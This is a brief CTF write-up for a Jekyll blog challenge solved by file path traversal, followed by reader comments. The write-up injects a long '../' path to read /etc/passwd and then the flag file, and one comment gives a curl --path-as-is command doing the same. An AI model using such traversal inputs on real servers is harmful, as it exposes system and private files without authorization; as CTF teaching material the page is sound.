Tags: web file_path_traversal 

Rating: 1.5

```
I prefer Jekyll for building my blog. Please try to read /home/web/flags/flag1.txt.
[http://34.82.101.212:8001] (down)
[http://59.124.168.42:8001]
```
```
After scanning the website i found that we can use the exploit of "File path traversal" from two links:

1st link: [http://34.82.101.212:8001/feed.xml]

2nd link: [http://34.82.101.212:8001/hope/2019/12/19/welcome-to-jekyll.html]

And then you just inject the path ../../../../../../../../../../../../../../../../etc/passwd and you will get the content of file.
And now we just changet [/etc/passwd] with [/home/web/flags/flag1.txt]
Bingooo you get the flag.
```

Original writeup (https://github.com/Mouwaffek/CTFs/blob/master/Happy_BambooFOX_ctf).
BabyKoalaJan. 3, 2020, 1:30 p.m.

I would use Burp suite for scanning and exploiting this vuln


p-beckerJan. 12, 2020, 6:58 p.m.

The browser strips out the relative paths ../
You can see the same thing happening when running curl --verbose.

But this works:
curl --path-as-is http://34.82.101.212:8001/../../../../../../../../../../home/web/flags/flag1.txt

Took me a while to figure this out, hope it helps someone :)